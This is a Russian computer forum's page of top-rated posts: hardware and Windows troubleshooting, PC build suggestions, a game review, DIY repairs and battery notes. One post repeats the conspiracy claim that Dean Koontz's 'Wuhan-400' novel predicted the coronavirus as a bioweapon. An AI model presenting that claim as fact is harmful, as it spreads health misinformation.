Jump to content
СофтФорум - всё о компьютерах и не только

Leaderboard


Popular Content

Showing content with the highest reputation since 12/05/18 in all areas

  1. 3 points
    Нету, кроме, как уже было сказано - написать в тех. поддержку. Еще раз повторюсь, конкретно у данной модели - 2 блина и 4 головки. Примеры с выложенными на фото винтами, вам не о чем не сказали? Все эти винты были подвергнуты вскрытию, если так понятнее. Сегодня разобрал еще один "крякнутый" винт, правда в формате 3.5". Количество блинов и головок можете лицезреть на фото. Как еще точнее вам инфу изложить? Ну можете вскрыть ваш винт, если так приспичило докопаться до истины.
  2. 2 points
    Ну да, Intel... Крепление кулера - четырьмя "гвоздиками", чрезвычайно неудобное, если пытаться что-то сделать с ними в корпусе, то бишь - не снимая материнку. Ну а то, что радиатор слегка шевелится - это нормально. Заодно и термопаста лучше расползается )))
  3. 2 points
    Можно было по ноуту и кувалдой - он бы тоже наверное, прекратил работать...
  4. 2 points
    Просто я не мало их за свою практику работы перелопатил. Приходилось вытаскивать из клиентских ноутбуков/консолей, вытягивать инфу. Некоторые приходилось восстанавливать, ставить новые контроллеры и "привязывать" блины к ним. Не суть... По второму вопросу. Все это бред собачий. Берите любой винт, в работе, "на глаз", вы никакой разницы между 2 блинами и 1 блином вообще не увидите! Гораздо важнее, скорость вращения самого шпинделя и, собственно говоря, наличие мало-мальски мощного железа "под капотом" вашего ПК. ;)
  5. 2 points
    ssssadad где покупали диск с Windows 7, можете фото купленной коробки прицепить? И, если не секрет, примерно за какую цену был куплен этот диск? Это многое прояснит. Драйверы следует качать с официального сайта производителя ноутбука. Очень часто производители не выкладывают драйверы устройств, которые уже присутствуют в поздних версиях Windows. Никакие утилиты для автоматической установки/обновления драйверов (кроме тех, что предлагаются производителем ноутбука) использовать не рекомендуется. К тому же, подобные утилиты, как правило, устанавливают только голые драйверы, в то время как многие устройства (например, звуковые карты), помимо самого драйвера, обычно требуют ещё дополнительный (заточенный для конкретного устройства) софт для управления и настройки этих устройств.
  6. 2 points
    Что-то "полезное" есть только до рекомендации отключить "Windows Firewall", но шанс очень мал. Сокращайте количество открытых вкладок или добавляйте оперативной памяти. Файл подкачки случаем не отключен?
  7. 1 point
    Кажется у Ирины ещё Windows XP. Там к управлению дисками чуток другой маршрут. Подробная инструкция о задании букв дискам в ХРюше - https://www.liveinternet.ru/users/demonsda/post109723897/ И что-то мне подсказывает, что Ирину надо предупредить о сохранении данных, прежде чем последовать совету Strateg'а переформатировать диск.
  8. 1 point
    Сменный диск всё равно может брать последнюю букву после перепотключения. Мой компьютер - Управление - Запоминающие устройства - управление дисками: 1) Задать CD-DVD приводу другую букву (например Х) 2) Задать разделу ту букву которая высвободилась D:\ 3) Задать CD-DVD букву E:\ тем самым поменяли местами. Там же правой кнопкой на разделе - Свойства - Общие Пишем название тома. --------- Название томов(логического диска), дело вкуса и эстэтики. FAT32 не позволит хранить фалы более 4Gb. Форматируйте в NTFS Если на диск что то проинсталировано - потеряются связи ссылки... Будите инсталить по новой.
  9. 1 point
    Гм... Дурно закреплённое - буквально болтается. Нормально закреплённое - ну вы же должны помнить, каково оно было под руками, когда снимали? Ну а термопасту вообще желательно хотя бы раз в год менять... P.S. Кстати... Платформа-то у вас какая? Intel или AMD? С Intel - всегда сложности с повторным закреплением радиатора, в отличие от AMD...
  10. 1 point
    Тридцать девять лет тому назад - то есть в 1981 году НИКТО не обратил внимания на предсказание Дина Кунца, которое содержится в ... 39-ой главе его фантастического романа "Глаза Тьмы". Почему же никто не обратил на внимания на предсказание писателя-фантаста? Ответ простой: в сюжетную линию романа (переживания матери, потерявшей любимого сына - прим. автора) разговор о смертельно опасной болезни вплетен таким образом, что поначалу даже кажется инородным "веществом". Заражение сына вирусом "Ухань-400" один из героев романа называет возможной причиной смерти сына. Теперь же, перечитывая 312 и 313 страницы, в голову приходит мысль о том, что автор фантастического романа историю о "Ухане-400" просто подслушал, сидя в каком-нибудь баре или, будучи к тому времени уже известным в США писателем, получил от кого-то из своих поклонников письмо с предложением написать книгу о китайском смертельном оружии. Рассмотрим первую версию: набравшийся виски незнакомец в баре вполне мог прийти "освежиться" после тяжелого трудового дня, проведенного, например, в ЦРУ или ФБР. Развязать язык такому человеку не просто, - это правда, но какой-нибудь Джо или Майкл мог специально "проболтаться", узнав за соседним столиком известного писателя. Зачем? А затем, например, чтобы ТАЙНО предать гласности гостайну, угрожающую на взгляд "простого американца" всему миру - отсюда и точная дата начала инфицирования. Вторая версия выглядит более правдоподобной, хотя бы в силу того, что в письме, в отличие от разговоров в баре, человек мог изложить более подробно все то, что ему стало известно о реальной угрозе для всего человечества этого жуткого заболевания будущего. Все мы помним, что первая версия заражения человеком коронавирусом звучала так: человек полакомился мясом летучей мыши. А теперь вернемся к "первоисточнику" знаний о коронавирусе - Дину Кунцу, он пишет: "Бактериальная инфекция появится первый раз в виде "болезни плотоядных", но затем через микроскопические клещи передастся от ЭКЗОТИЧЕСКИХ ПТИЦ человеку". Остальное тут - https://newizv.ru/news/politics/12-03-2020/idealnoe-oruzhie-uhan-400-poyavlenie-koronavirusa-bylo-predskazano-v-1981-godu Каково ваше мнение, форумчане, на этот счет?
  11. 1 point
    Вы таки будете смеяться, но ключевое слово тут - лопата. Я уже замучился их покупать чуть ли не каждый месяц. Дальше речь пойдет о попытке починить снеговые лопаты с поломанным или потресканным пластиковым ковшом. Можно конечно заменить ковш, но у нас их или вообще не найдешь, или они стоят дороже чем вся лопата целиком. Ни разу не шучу. В настоящий момент у меня есть две поломанных лопаты, которые я в разное время пытался чинить разными способами. Одна из них с прямой трещиной посередине, раньше я насверлил отверстий и сшил трещину кабельными стяжками. Это в общем работает, но лопата получилась хлипкая, склонная к перекосу, - трещина "играет". Для легкого снега подойдет, но для тяжелого и твердого уже нет. Стяжки время от времени рвутся, но и заменить их не трудно. Можно взять на заметку этот способ. Вторая лопата с длинной кривой трещиной вблизи края. Пытался наложить заплатки из текстолита, - тоже можно работать с легким снегом, и тоже трещина фиксируется недостаточно надежно. Текстолит довольно недешевая забава, просто он у меня есть, потому что я когда-то давно накупил его для одного неудавшегося проекта. Лучше было бы конечно использовать железо или алюминий, но дело происходит в квартире, где не особо большие залежи разных материалов. Всё убрал, и решил поступить по-другому. А именно использовать металлические кронштейны, которые применяются в строительстве, и которые довольно просто найти в продаже. Это вот такие железки: Конечно в условиях дачи или сельской местности можно найти и другое железо, но где его взять а так же как резать и сверлить в квартире. А эти полосы использовать очень удобно. Они бывают разных форм и видов, но у меня вот такие. Используются только боковые части с отверстиями. При чем расположить эти полосы нужно так, что бы каждый ряд отверстий захватывал разные стороны трещины. Крепил эти железки на заклепки, при помощи заклепочного пистолета (заклепочника). Заклепки у меня оказались слишком длинными, потому пришлось подкладывать под них шайбы. Использовались заклепки 4Х8 мм. Железки расположены сверху лопаты, а снизу только головки заклепок. Объяснение простое, - под снегом у меня бетон, и я просто сдеру все заплатки, если они будут снизу. Так же приклепал металлическую рейку - насадку на лопату. В принципе хватило бы и трёх заклёпок, но я сделал пять. Как говорит один коллега - у моих родителей дети не жадные. Это лучше сделать и на новой лопате сразу после покупки, потому что эта рейка плохо держится и очень быстро слетает и теряется в снегу. При сверлении и клепании лучше чем-то плотно обжать рейку, например в тисках, или каким-то другим способом. Под заклёпки так же лучше подложить шайбы. Головки заклёпок должны быть снизу. При работе использовались: Указанные кронштейны. Шуруповерт со сверлом на 4 мм. Заклепочник с заклепками разной длины диаметром 4 мм. Шайбы на 4 мм. Дремель с отрезными дисками для резки кронштейнов. Конечно можно использовать ножницы по металлу, но у меня в квартире их нет, за то дремелей аж три штуки. Ну ладно, два с половиной. Настольные тиски. По прочности на глазок лопаты не хуже новых, возможно что и лучше. Для заключения о том как они поведут себя при работе нужно время. В гараже конечно их не оставлю, весной увезу на дачу, там будет много работы по откапыванию дома и построек от снега, которого там дофигища. Тогда и отпишусь. Есть конечно более элегантный способ как всё это починить. Это способ пайки пластмасс, тем более что у меня почти всё для этого есть, кроме припоя. А с припоем проблемы, что бы хорошо запаять пластмассу надо знать что это за пластмасса, и применить соответствующий припой. А сортов пластмасс не знаю сколько, но по крайней мере самых популярных только с десяток. А что за пластмасса в этих лопатах - кто же его знает, наверно намешали разных отходов. Можно было бы конечно купить все образцы припоев, и найти подходящий экспериментально. Но Алиэкспресс сейчас не в лучшей форме. PS: Ну и настало то время проверить о котором я говорил. А именно интенсивное использование на даче. Результаты неутешительные, все лопаты переломались по новой. Скорее всего из пластмассы испарился пластификатор, ну или какой-то компонент, который делал её гибкой, и потому она стала хрупкой. Насчет пластмассы: Скорее всего это полипропилен (PP) переработанный из вторсырья. Так что чинить эти лопаты, и тем более мечтать их запаять, - изначально не шибко умная идея. Просто я незадолго до всего этого купил заклепочник, и надо было на чем-то потренироваться. Не на кошках же. Хотя повторюсь - для легкого свежего снега подойдет.
  12. 1 point
    Причин может быть много на самом деле, от подключённой периферии до проблемы с драйвером, вот в этой статье подробно рассмотрены все причины, уверен, что вы найдёте источник проблемы - https://tehnichka.pro/windows-10-freezes-on-logo/. Но больше всего ставлю на драйверы, если обновите их, то проблема должна решится. А быстрый старт уже после настроите, когда с проблемой разберетесь, найти его можно в разделе "электропитание - действие кнопок питания", но это гибернация другими словами. Другого быстрого запуска нету.
  13. 1 point
    С Праздником! Сражаться только в играх! Мирного неба! Любви!
  14. 1 point
    Поздравляю всех мужчин с наступающим праздником! Всем здоровья и мирного неба над головой!
  15. 1 point
    При грамотной эксплуатации любая версия Windows из семейства NT (Windows 2000/XP/Vista/7/8/10) вполне сносно работает без переустановки на протяжении нескольких лет. Проблемы в основном начинаются только по причине отсутствия поддержки устаревших версий ОС производителями софта и оборудования. Samsung Galaxy S3 Neo с 4 ядрами вполне шустро бегал на Android 4.4 больше 5 лет (позже сменил его на Sony Xperia 10 Plus). У Android довольно хороший API, который постоянно допиливается. Если говорить о стоковых приложениях и сервисах, то они работают довольно стабильно и я не могу сказать, что они убогие. Да и с безопасностью в этой ОС всё очень неплохо, есть те же runtime permissions, которые позволяют блокировать отдельный функционал приложений (например, доступ к камере или к геолокации, если пользователь не хочет этого). В Symbian, на сколько я помню, нативные приложения вообще не имели никаких ограничений и могли делать в системе всё, что хотели (ограничения были только для Java ME приложений). Сложность устройств и софта всегда сказывается на стабильности. Да, раньше было меньше тормозов, но раньше и возможности были куда более скудными, и в плане безопасности всё было куда хуже.
  16. 1 point
    Я не знаю, чем графическая оболочка Win10 может отличаться от графической оболочки XP или Висты. Вот этими плитками что ли? Ну жрут они что-то, это да, потому как шарятся и по винту и по интернету, но я не думаю что это уж очень критично. А если не нравится, то их можно удалить, как штатными средствами, так и внешними, например CCleaner. Как видно у меня плиток почти не осталось, все поудалял, оставил только те, которые теоретически могут мне понадобиться. Если скажем какие-то файлы ассоциированы на какую-то нежелательную встроенную программу, скажем видеофайлы открываются при помощи "Кино и ТВ", или там какой-то другой аналогичный случай, то никто не мешает поставить предпочтительную программу, и переассоциировать файлы на неё. Комп загружается с нуля до рабочего состояния секунд за 7-10, если не считать время ввода пароля. Режим запуска ОС у меня тоже крайне упрощен, никакого выбора заставок на каждый день, или там шуток и приколов от Мелкомягких (я их и не видел даже). Так что посидеть немножко, что-то удалить, что-то отключить, и Винда и Винда, как я говорил. Вот в Win8, действительно было черти-что, которое можно было назвать графической оболочкой, и которая вероятно могла бы что-то тормозить, но это частично устранили в Win8.1, и почти совсем в Win10. Ладно, этот комп довольно новый, куплен в конце 18 года, но есть еще ноут Acer Aspire V3 771G, которому уж наверно лет пять, на нем стоит та же самая Десятка. Загружается конечно дольше, по причине механического винта, с момента включения до рабочего состояния наверно секунд за 30, и так же особых тормозов по сравнению с Win8 так же не припомню. Возможно тут еще дело в том, что я Win7 никогда серьёзно не пользовался. На стационарном компе долгое время была Виста, которую все ругали, потому что так положено было. Потом купил комп сразу с Win10, и не заметил особой разницы, ну оформление чуть другое, и всё. А ноут сразу был куплен с Win8. Непривычная была ОС, это да, но то что плохая сказать не могу. Так что перепрыгнул я Win7, и касался этой ОС только на работе, и тоже, ни усмотрел какой-то особой разницы ни с Вистой ни с Десяткой. Еще, насчет старых устройств. Эта проблема не нова, как это не прискорбно. Да бывает пропадает поддержка старых устройств, которые мы любим. У одного коллеги так когда-то видеокамера отвалилась, не помню её типа, цифровая но кассетная. Когда он рассказал на работе о своей проблеме, ему сказали что он неправильно проявляет плёнку, - прямо в кассете, а надо вытащить. И даже слушать никто не стал, сказали - иди купи нормальную цифровую камеру с SD картой.
  17. 1 point
    Гм...Коллега... Фиг его знает, что они там повпендюривали, но... Но вот давеча (с года полтора назад) - достался мне HP ProBook 450 G1 с дохлым винтом. Поставил в него древний винт (SCSI\DiskHitachi__HTS543225A7A384ESBO (это ID) - поставил Семёрку Pro, х64 естественно, лицензию, освежил до Десятки - и никаких проблем! Да, был бы SSD (что планирую по апгрейду десктопа - переставить) - оно бы крутилось значительно шустрее, но - и без того быстродействием не обижен, хотя сборка Форточек - 1909. Про бегающий Skyrim - даже не говорю, но ведь даже Fallout 4 на средних настройках - спокойно выдаёт 35-40 FPS даже на имеющейся дискретной (AMD Radeon HD 8750M) видеокарте! А уж её-то уж никак нельзя отнести к мощным... Может быть, всё-таки как в той старой рекламе - "Всё дело в волшебных пузырьках ", тьху - настройках?
  18. 1 point
    Sanada Вариант на Интел. Проц - Pentium g5400 3.7ghz (2 ядра, 4 потока) Не смейтесь. Этот малыш - идеальный рабочий муравей для той среды, что вы описали. К тому же стоит копейки и обходится стоковой охладой. Мать - asrock b365m pro-4 Память - corsair vengeance 16гб ддр4 2400мгц - будет работать синхронно с процессором, что прибавит до +5% к производительности m2 ssd - a-data xpg gammix s11 pro 512гб - надежный и быстрый HDD - toshiba dt01aca200 - 2тб 7200rpm "Башня" - sharkoon vs4-v БП - be quiet system power 9 - 500 ватт ПЫСЫ. Думаю, что вылез из бюджета баксиев на 40.
  19. 1 point
    Собственно - вот. Итоговая сумма - 28 081 Правда, лично я - добавил бы оперативки до 16 гигабайт, оперативки много не бывает. Почему AMD? Потому что лучше и дешевле, а встроенное видеоядро - значительно лучше, чем у Intel. Монитор.
  20. 1 point
    И не надевайте обувь на высокой платформе! Мою подругу досматривали почти час, несчастные туфли и так и сяк просвечивали, простукивали, обнюхивали с собакой, хорошо, что не разодрали на части, она чуть на рейс не опоздала! (летела из России, но израильской авиалинией)
  21. 1 point
    С Новым годом, друзья! Пусть ничего не ломается, пусть мечты сбываются! Здоровья крепкого и счастья безмерного!
  22. 1 point
    У Windows 8/8.1/10 есть такая опция, как "Быстрый запуск" (в настройках электропитания включается и отключается, по умолчанию включена), она может стать причиной пропуска загрузчика Windows 7 при включении ПК после выключения из Windows 10. Когда включён быстрый запуск, при выключении компьютера происходит запись содержимого оперативной памяти на жёсткий диск для последующего быстрого запуска системы. По сути, это такой своеобразный режим гибернации, только на HDD при выключении сбрасывается не всё содержимое ОЗУ, а только отдельная часть (там, куда загружены драйверы устройств и параметры ядра), что позволяет при последующем запуске пропустить часть долгих операций и быстро приступить к работе (а не ждать, когда по новой будут загружены драйверы устройств). И происходит это только при выключении компьютера, но не при перезагрузке (то, о чём vpc как раз говорил выше). Отключить быстрый запуск можно, зайдя в Пуск => Параметры => Система. Слева выбираем пункт Питание и спящий режим, затем справа щёлкаем по ссылке Дополнительные параметры питания. Затем в появившемся окне слева кликаем Действие кнопки питания. Появится окно с галочками в нижней части, которые будут недоступны. Щёлкаем в верхней части окна по ссылке Изменение параметров, которые сейчас недоступны, после чего в нижней части отключаем первую галку - Включить быстрый запуск и жмём Сохранить изменения.
  23. 1 point
    И что мы должны узнать из дамп файла, какие ключи реестра удалил CCleaner и каким-то магическим образом материализовать их из воздуха? "Уж сколько раз твердили миру...", что от всяких "чистилок" реестра вреда гораздо больше чем пользы, все народу невдомек. Лучше банальную дефрагментацию проводили бы регулярно, толку было бы куда как больше. Если установлена точка восстановления, попытайтесь произвести "откат", или же придется устанавливать винду с нуля. Тут без вариантов.
  24. 1 point
    Как говаривал классик: "Шо делать, куда это все послать, и кому настучать по роже?!" Прицепите винт к стационару и сохраните копии данных на другой носитель, ибо старый сыплется. Звук издается по причине того, что головке не удается прочитать битый сектор. Вот она и "елозит" по одному и тому же месту... P.S. Глаз на выкол - что у вас Seagate? 17 пользования и тут такой нежданчик. Один из первых мною купленных сигейтовских винтов на 750гб, пережил аж 3 апгрейда и с достоинством почил в бозе, после 19 лет службы.
  25. 1 point
    Непонятно назначение программы. В 1-посте говорится о другом. Это ошибка?
  26. 1 point
    Речь сегодняшнего повествования пойдет о третьей части игры Borderlands. Корпорация «Гиперион» канула в лету. Сюжетная линия выстраивается вокруг Вонна – бывшего наёмного работника корпорации (бухгалтер, милый мой бухгалтер...), прилетевшего на планету, с целью заключения сделки, которая сорвалась. Кто помнит «Tales from the Borderlands», тому нету необходимости пересказывать предысторию. Появление Вонна сразу же вызывает улыбку на лице, т.к. данный персонаж совсем одичал, носит на себе грязные трусселя и с «кукушкой» у него явно не все в порядке. Повествование стартует с того момента, как он попытался подчинить себе клан выживших, после крушения станции «Гиперион», возглавив его, но, как это часто бывает, что-то пошло не так...! После потери контроля над своим кланом, люди Вонна разбрелись по всей Пандоре, создавая тем самым микро-бандитские анклавы, так и норовящие выпустить кишки друг-дружке. Братва стала объединяться с бывшими военизированными соединениями «Даль», «Алое копье», «Маливан» и прочей нечистью. Посреди этого безобразия, объявились еще и мошенники, провозгласившие себя «детьми божьими», то бишь – прямыми непосредственными наследниками богов или же «хранителей», со всеми вытекающими отсюда предпосылками, заполучить контроль над всеми сокровищницами планеты. Игра раздалась ввысь и вширь. Помимо основых заданий, как всегда остались доступными и дополнительные, однако затронуть мне бы хотелось вот какой немаловажный аспект. Лучшее оружие в игре создает безумный оружейник Эрл. Поскольку он, еще отталкиваясь от сюжета первой части игры, был страшным параноиком, то и дверь отсека, на космическом шаттле, ведущая к нему, забавно замотана аж тремя слоями здоровенных цепей, и это, несмотря на свою и без того довольно внушительную массивность. Некоторые «пасхалки», как то: фотографии «Красавчика Джека» в каютах, старая добрая толстушка Элли, расхаживающая с татушкой брата – Скутера, на плече, все эти детали добавляют интереса к игре. Проходя мимо кассовых аппаратов, заграбастав содержимое, можно наблюдать, как из них выбиваются чеки с надписями: «Отвали», «Не в этот раз» и т.п. Карта в игре –выше всяких похвал. Она просто шикарна! Я действительно не встречал столь грамотно проработанного 3Д варианта карты, ни в одной до селе пройденной игре. Её можно крутить и увеличивать во всех направлениях, «прижимая» чуть ли не вплотную к экрану, вглядываясь в каждый уголок. Внимание разработчиков к таким мелочам, только радует и подстегивает все больше и больше исследовать интереснейший мир игры. Арсенал обзавелся невероятной красочностью. Каждое «космическое глушило» нарисовано с особой любовью в ярко-аляпистой палитре. Оно приобрело несколько удобных функций переключения между режимами стрельбы, ровно как и возможностью менять эффекты заморозки, уничтожения кислотой, либо поливания огнём. Данной функции часто нехватало в первых двух частях игры. Тут она здорово упрощает игровой процесс. Помимо простого практического применения данной возможности, к ней добавляется еще и удовольствие лицезреть мечущихся по округе противников, испепеленных в труху, либо корчащихся в шоковых конвульсиях. Кроме того, оружие стало более антуражным и разнообразным. К примеру, обычные дробовики делятся аж на несколько видов (мне не удалось встретить двух одинаковых на всем протяжении геймплея): с подствольными и боковыми магазинами, с мушками а ля «ласточкин хвост», полу-прицелами, голографическими прицелами и т.п. Вариации стрельбы так же зашкаливают. Появились снайперские винтовки, выпускающие самонаводящиеся пули, стоит произвести очередь из пары выстрелов – остальные автоматически поражают цель, по круговой траектории, в заданном направлении, даже будучи выпущенными из-за какого-нибудь укрытия. Счетчики патронов часто встраиваются в сам прицел, что очень облегчает подсчёт боезапаса. Оружие подразделяется на классы: накапливающее заряд, и молниеносно выплевывающее во вражин всю обойму, а также своего рода «кислотные поливалки», в мгновение ока превращающие супостатов в зеленые биологические лужицы. Пистолеты обзавелись вращающимися стволами, в которых можно заменить азотистый заряд на фаерболл. Функциональность щитов улучшилась. Так, истративший прочность щит, в некоторых вариациях, даёт играющему возможность увеличить урон от оружия (до 30%) первые несколько выстрелов, расходуя показатели брони. Что очень даже недурственно! Появились даже старые добрые двухзарядные винтовки, по стилю очень напоминающие дробовик из «Дум». Стволы корпорации «Гиперион» (а насколько нам известно эта контора являлась лидером в разного рода технологических сферах), отличаются особым шиком. При активации, вокруг стрелка появляется голографический щит, который расходуется со временем, но даёт довольно долгое время продержаться под ливнем пуль, без необходимости расходовать основной щит. Очень пригождалось, во время интенсивных баталий. Всякое хрюкающее, гавкающее и летающее зверье, обладает своими специфическими навыками умерщвления вас - родимого. Зазевались, глядя на красоты каньона – ждите сюрприза, в виде огненного дождика, подаренного вам с высоты, доброй клыкастой зверушкой. Понравилось небольшое нововведение. Так, уничтожая, кружащегося над вами назойливого жучилу, тот не помирает сразу, а закапывается под землю, и через некоторое время из раздутого гриба-кокона, появляется новая тварюга, с новым набором кровожадностей. Причем мутаций с перевоплощениями одного вида в другой, я насчитал аж целых 3. А ежели таких грибочков набиралось хотя бы 4-5, то начиналось такое месилово, что клавиатура плавилась от барабанной дроби по ней. Это выглядело очень необычно и приятно удивило по первому прохождению. Боссы, в сравнении с предыдущими частями игры стали менее однообразны, и более колоритны. Озвучка оных вне всяких похвал, да и сам главный персонаж не даёт скучать, раз от раза выпаливая фразочки, над тушками убиенных врагов, уровня: «Ты мне больше нравишься мертвым!» Разработчики вернули возможность менять облик персонажа в соответствующих магазинчиках. Это, конечно же порадует любителей сменить образ. Сами магазинчики по продаже всякого разного хабара, отбрасывая в сторону забавную анимацию, теперь представляют из себя настоящие произведения графического искусства. Стоит подойти к такому, как из него с шумом и скрипом выдвигаются лотки с товаром: гранаты, щиты, патроны, на любой маниакальный вкус. Все оружие, как и аммуниция на лотках - двухмерные, что создает дополнительное ощущение присутствия. Пропала необходимость, вскрыв ящик, муторно копаться в нём в поисках нужных боеприпасов, они собираются автоматически, стоит сбросить крышку. То же самое характерно для запаса деньжат. Помимо этого, долляры можно собирать просто проехав по трупу убитого скагга, не вылезая из транспортного средства. Напомню, в первых двух частях игры, для этого, приходилось выбираться наружу и собирать каждую пачку банкнот – вручную, что здорово раздражало. Вообще мир игры стал более живым, насыщенным и менее плоским. Не обошлось и без ложки дёгтя. Я всегда уважал игры от 2К за то, что они были вылизаны «до нельзя» в плане оптимизации, но, увы, тут другой случай. К жирным минусам можно отнести всякое отсутствие оптимизации под слабенькое железо. Да, для того, чтобы полноценно насладиться всеми красотами Borderlands-3, у вас должна быть очень навороченная игровая станция, и лучше с м2 ссд диском. Игра очень прожорлива к ресурсам, при задействованном dx12 (а без него вы потеряете как минимум - половину граф. удовольствия). Одним словом – удачи в прохождении! За сим откланяюсь. 😉
  27. 1 point
    mikemet, с Днём рождения! Здоровья, везения, мира в душе и благополучия!
  28. 1 point
    Что-то помнится, что еще в лохматые года уже были онлайн-сервисы по определению музыки. Да и программы тоже. Но сам я ими никогда не пользовался. Сейчас загуглил, нашел статью по этому поводу: https://remontka.pro/opredelit-pesnyu/ Если кто-то есть рядом, кто понимает по английски на слух, то вообще просто, хотя бы строчку из песни вбиваем в Гугл, и как правило вуаля.
  29. 1 point
    Skipp во втором трэке услышал вокал The Offspring
  30. 1 point
    Эм-м... )))), Спасибо, конечно, но современные команды... Как-то мне менее интересны, к сожалению. Не, конечно же, я не кричу, размахивая руками - "Чур меня, чур!", но... Как-то не слежу за ними. Во всяком случае, представленные три трека - сильно напоминают RHCP (Red Hot Chili Pepper) по манере исполнения. К сожалению, утилитка Shazam - ушла от Windows ещё пару лет назад... Осталась она под Mac-машинки, и для смартфонов и планшетов. Поскольку я ею никогда не пользовался (за ненадом))) - то и ставить себе, скорее всего - не буду.
  31. 1 point
    Довелось разобрать один из двухкнопочных пультов, и посмотреть у него внутри. В начале этого лета один из пультов которые я "привязал" к описанной выше (6 ноября 2018) радиоуправляемой розетке был потерян на участке, и найден буквально недавно, втоптанным в землю. Таким образом он пролежал в земле примерно с июня по сентябрь: Похоже кроме того что он лежал в земле, его еще кто-то безуспешно грыз. Вскрытие показало, что питается он от двух литиевых батареек CR2016, соединенных последовательно. Напряжение питания - 6 вольт. При чем вышла из строя только одна батарейка, и довольно интересно. Она не просто разрядилась, но и поменяла полярность. Вторая батарейка была конечно тоже не первой свежести, но сохраняла работоспособность. Как я предполагал, схема в общем на тех же деталях что и передатчик TX118S-4 V1 описанный выше, но конструктивно конечно всё сделано по-другому. Можно например заметить встроенную антенну. После того как я отмыл и отчистил от ржавчины этот пульт и заменил батарейки на новые, он оказался исправным. Меня беспокоило то, что после смены батареек в пульте приёмник его уже не опознает, а повторная настройка будет затруднительна, так как мало того что нужно будет разбирать аппарат, но и еще отдирать корпус модуля от стенки коробки. Но нет, приёмник всё еще помнит этот пульт, и работает с ним нормально. Так что замена батареек не влечет за собой никаких проблем. Корпус скрепляют три болта (не самореза) никаких защелок нет, разобрать довольно просто, нужна только маленькая крестовая отвертка. Так что пульты такого типа вполне надежны. За 4 месяца лежания в земле фактически не произошло выхода из строя.
  32. 1 point
    Кэш решает в зависимости от того, чем вы будете заниматься. Для игрулек хватит и 32мб, а вот для копирования больших объемов данных (скажем BD рипы или обработка 4К контента) его, само-собой, лучше иметь побольше. Недаром для хранилищ, где требуется быстрый доступ к данным, в NAS винтах: 6/8/12тб, используются 128мб/256мб кэша. Ежели вас так беспокоит вопрос, касаемо пластин/блинов, вы можете написать в тех. поддержку "Хитачи" и получить точный ответ.
  33. 1 point
    Значит в разъёме никакого "железного" переключателя о котором я говорил нет, тут более хитро. Когда некая электронная схема обнаруживает подключение наушников, она перенаправляет звук согласно настроек, которые могут быть разные. В общем как в компьютере.
  34. 1 point
    Где? Несколько раз перечитал. Я же решил, что не хотите оставлять подключенные наушники рядом с телевизором, дабы не портить эстетику полки/тумбы/и т.п. кольцами провода.
  35. 1 point
    Насколько надежны сказать не могу, так как никогда ничем таким не пользовался. К тому же меня беспокоит то, от чего они питаются. Скорее всего аккумуляторы стоят и в "базе" и в самих наушниках. А это добавляет мороки, надо не забывать их заряжать. Хорошо бы найти простой и дешевый усилитель для наушников, который брал бы сигнал с тюльпана, питался бы от USB телевизора, и имел обычный разъём для подключения обычных наушников. Но чего-то такого я не нашел.
  36. 1 point
    Перво-наперво посмотреть в настройках телевизора, может быть там есть настройки перенаправления звука. Если таких настроек нет, то скорее всего там просто разъём с датчиком. Что это значит, сперва немного предыстории: В гнездо наушников, которое находится внутри телевизора, встроен переключатель, который своими контактами и переключает звук на динамики или наушники. Срабатывает этот переключатель чисто механически, когда втыкается разъём. Стало быть эту проблему каким-то внешним устройством решить если и можно, то фиг знает как. Скорее всего нельзя, или это будет какая-то эквилибристика с подтачиванием разъёма, или еще какая-нибудь ерунда, которую я только сейчас придумал. Что можно сделать в данном случае. Беспроводные наушники, это выход. Но нужно найти такие, которые включаются либо в выход Audio OUT (тюльпан), либо в гнездо SCART. С разъёмом HDMI вряд ли что-то получится, по крайней мере дешево и просто. PS: Гнездо наушников не трогаем, только или тюльпан, или SCART. Сейчас специально загуглил, оказывается таких наушников достаточно в продаже. Достаточно загуглить беспроводные наушники для телевизора. При указанных условиях наушники будут работать всегда, а если будут мешать динамики, то достаточно просто уменьшить звук до нуля, на работе наушников это не скажется. Естественно при покупке нужно выяснить все нюансы самостоятельно, я никаких гарантий не даю.
  37. 1 point
    Хоть это не блок, но всё равно источник питания. Решил немного рассказать о довольно новом типе аккумуляторов, таких как Никель-Цинковые (Ni-Zn). Разработаны они были еще Эдисоном, но в продаже появились относительно недавно. И насколько я могу судить, - так и не нашли свою "нишу", и остаются мало востребованными. Наиболее часто они встречаются в формфакторах АА и ААА, то есть как обычные популярные батарейки. Это "родня" всем никелевым аккумуляторам, но они позиционируются как специально разработанные для замены гальванических батареек на 1,5 вольт. И потому у них имеются некоторые отличия от например Ni-Cd, Ni-MH аккумуляторов. Думаю никто не будет спорить, что Ni-MH аккумулятор это не совсем корректная замена обычной батарейке в тех устройствах, которые рассчитывались на работу с ними. Потому что такой аккумулятор имеет рабочее напряжение 1,2 вольта, против 1,5 у батарейки. И свежезаряженный Ni-MH аккумулятор с точки зрения такого устройства уже ведет себя как наполовину севшая батарейка. И при ещё достаточном заряде Ni-MH аккумулятора, некоторые устройства уже не смогут работать. Аккумулятор отправится на преждевременную зарядку, чем будет спровоцирован т.н. эффект памяти, избавиться от которого довольно сложно. В Ni-Zn аккумуляторах этот момент учтен, их рабочее напряжение 1,6 вольта, и отсутствует эффект памяти. Так же имеются и другие отличия, например горизонтальный разрядный график. Что это значит: предположим мы подключили к обычной батарейке или Ni-Cd, Ni-MH аккумулятору лампочку, ждем и смотрим что будет. Лампочка сперва будет гореть ярко, потом начнет постепенно тускнеть, и наконец погаснет. То есть у таких аккумуляторов наклонный разрядный график. С Ni-Zn аккумулятором не так, лампочка будет гореть ярко, пока в какой-то момент резко не погаснет. Это и хорошо и плохо. Хорошо то, что аккумулятор выдает стабильное напряжение практически независимо от уровня заряда, а плохо тем что трудно следить за процессом разряда, и можно прощелкать момент когда напряжение снизится ниже критического уровня, и тем убить аккумулятор. Так как минимальное напряжение, ниже которого нельзя разряжать аккумулятор тут так же никто не отменял. В интернете данные по таким аккумуляторам разнятся, потому кое-что было взято из разных статей, кое-что додумал сам: Ёмкость Ni-Zn аккумуляторов измеряется не во всем привычных миллиамперах в час (mah), а в милливаттах в час (mwh). Скорее всего это связано с тем, что милливаттов почти в два раза больше чем миллиамперов. Думаю что китайцы как-то прознали, что в попугаях удав длиннее чем в слоненках. Другого объяснения я не вижу. Что бы перевести милливатты в миллиамперы, нужно милливатты поделить на напряжение питания.... какое? Рабочее (1,6) или в конце заряда (1,9)? Будем считать что рабочее. Ёмкость моих аккумуляторов 2500 mwh, значит делим на 1,6 V, получаем 1562,5 